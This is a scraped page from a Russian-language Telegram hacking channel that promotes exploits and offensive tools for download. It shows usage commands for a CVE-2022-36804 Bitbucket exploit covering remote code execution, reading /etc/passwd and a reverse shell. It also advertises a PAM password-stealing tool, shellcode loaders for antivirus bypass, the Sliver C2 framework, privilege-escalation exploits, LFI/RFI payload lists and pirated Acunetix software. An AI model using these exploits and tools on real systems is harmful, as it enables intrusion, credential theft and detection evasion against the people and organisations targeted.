Proxy Bar – Telegram
Proxy Bar
19.6K subscribers
1.29K photos
79 videos
664 files
1.33K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
secretscanner.noscript
262.3 KB
SecretScanner
Ищем секреты в образах контейнеров или файловых системах.
*
Инструмент автономный, ищет контейнеры и файловые системы хоста, после чего сравнивает найденное с со своей базой данных, в которой на данный момент около 140 секретных типов
Download

#docker #security
👍2
This media is not supported in your browser
VIEW IN TELEGRAM
pamspy - Воруем учетки в Linux используя eBPF
PAM модулями пользуются многие приложения для аутентификации (sudo, sshd, passwd и так далее), и статей по теме заBACKDOORивания PAM модулей в инете предостаточно.
*
pamspy подгружает пользовательскую программу eBPF, чтобы перехватить функцию pam_get_authtok из libpam.so. И каждый раз когда условный пользователь пытается пройти аутентификацию он дергает pam_get_authtok - тут то pamspy выдернет пароль !
*
DOWNLOAD ——-> pamspy

#linux #pam
🔥2👍1
Cobalt Strike: и его payloads
Разбираемся что и как, анализируем и декодируем. Хорошая статья, рекомендую !
Read

#cobaltstrike
👍1
CVE-2022-36804-PoC-bitbucket.zip
6.5 KB
CVE-2022-36804 - Bitbucket
Для versions <8.3.1 (так как патч уже выпущен)
Сплоит ищет общедоступные репы на хосте
Bitbucket

для исполнения уязвимости.
*
Если открытой репы нет, то требуется действительный файл cookie BITBUCKETSESSIONID.
*
RCE (Remote Code Execution)
CVE-2022-36804.py -e rce --cmd "curl http://example.com/" http://bitbucket.local:7990/

Download /etc/passwd
CVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/

Reverse_shell
CVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/

#bitbucket
👍1
ANSIBLE - CVE-2022-2568
LPE exploit download
На фоне печальных новостей про CobaltStrike, некоторые ребята задаются вопросом: "А может заменить этот платный кобальт на что то другое ?"
И такой инструмент ЕСТЬ !
*
Sliver (кроссплатфоменный, опенсорсный, активно развивается)
*
Download\скачать Sliver
Site: Sliver
Video guides: lesson-1, lesson-2, lesson-3
Book: в тему поста тут

😎☠️🎃
🔥5👍3😱1
В виду снижения общего уровня интеллекта, мы выпустили книгу)))
👍21😱5
РуткитоПисателям под windows на заметку !
Custom Kernel Signers

#windows #drivers #rootkit
dll4shell
C++ shellcode launcher
Коллекция оболочек DLL для разных методов внедрения шелл-кода и обфускации (AV bypass).
Основано на реальных событиях на charlotte
DownLoad dll4shell
👍5
cve-2022-39197
Та самая XSS найденная в Cobalt Strike 4.7
Еще раз прочитать про дырку
Скачать exploit

#cobaltstrike #exploit
👍4
О чем говорит ЦРУ ?!
The Langley Files: A CIA Podcast
Послушать что там несёт директор ЦРУ Уильям Дж. Бернс можно тут )))))

#CIA
Acunetix_14.9.220830118_linux.7z
250.8 MB
Acunetix 14.9.220830118
linux version

#acunetix
🔥7
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2022-30206
Опять windows, опять print spooler, опять LPE
download exploit

#windows #lpe
😱8👍3
Advanced Exploit Development
Курс SANS SEC760
Download 25GB
🔥15👍1😱1
Hacking books
Подборка для: линуксоидов, виндузоидов, программоидов, хакероидов, сетевикоидов и паранаидоидов)
605 книг в PDF
download
🔥10👍1
Советую присмотреться и начать мониторить этот блог !
POC для нового метода обхода сканеров памяти
Cronos
👍11
Ни мы, ни Народно-освободительная армия Китая, Вам ничего не говорили 🪖
ShellCode_Loader

#shellcode #msf #cobaltstrike
👍3
Shift+F10=system
Забавнейший bypass в windows (в перспективе от winXP до win11 )
Дырку microsoft признали, но багой не считают и исправлять не будут )))
*
В общем смешнейший privilge escalation до прав system )))
Читаем вникаем
Смотрим и смеемся

#windows
😱14🔥9👍1
════════════════════════════════════╦═══
╔═╦═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╦═╗ ╔═╗ ╔══╔═╗ ╠═╗
═╩ ╩ ╩═╚═╝═╩ ╩═╚═╝═╩ ╩ ╩═╚═╝═╩ ╠═╝═╩ ╩═
════════════════════════════════╩═══════
monomorph - казалось бы, обыкновенный упаковщик шеллкодесов под linux x86-64,
НО !, на выходе файл всегда будет иметь один и тот же хэш MD5: 3cebbe60d91ce760409bbe513593e401.
Прикольно, но пока несколько наивно)))
А следующим шагом нужно вызвать коллизии с хэшами системных файлов и посмотреть, что произойдет с AV, смекнули ? ))))
Download monomorph
🔥10👍5😱5
NUCLEAR WEAPONS CYBERSECURITY (September 2022)

read
👍1
BEST LFI/RFI Payload lists:

LFI Payload List - download
Payloadbox LFI/RFI - download
Hacktricks Guide - book
PayloadsAllTheThings - get

#lfi #rfi
👍4🔥2